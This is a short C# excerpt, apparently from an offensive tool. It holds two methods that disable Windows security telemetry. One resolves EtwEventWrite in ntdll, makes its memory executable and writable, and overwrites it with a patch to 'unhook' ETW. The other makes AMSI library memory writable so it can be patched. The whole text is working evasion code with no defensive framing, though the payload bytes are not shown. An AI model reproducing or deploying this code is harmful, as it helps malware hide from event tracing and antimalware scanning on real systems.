private static void PatchETW() { IntPtr pEtwEventSend = GetLibraryAddress("ntdll.dll", "EtwEventWrite"); IntPtr pVirtualProtect = GetLibraryAddress("kernel32.dll", "VirtualProtect"); VirtualProtect fVirtualProtect = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(pVirtualProtect, typeof(VirtualProtect)); var patch = getETWPayload(); uint oldProtect; if (fVirtualProtect(pEtwEventSend, (UIntPtr)patch.Length, 0x40, out oldProtect)) { Marshal.Copy(patch, 0, pEtwEventSend, patch.Length); Console.WriteLine("[+] Successfully unhooked ETW!"); } }
private static IntPtr unProtect(IntPtr amsiLibPtr) { IntPtr pVirtualProtect = GetLibraryAddress("kernel32.dll", "VirtualProtect"); VirtualProtect fVirtualProtect = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(pVirtualProtect, typeof(VirtualProtect)); uint newMemSpaceProtection = 0; if (fVirtualProtect(amsiLibPtr, (UIntPtr)getAMSIPayload().Length, 0x40, out newMemSpaceProtection)) { return(amsiLibPtr); } else { return((IntPtr)0); } }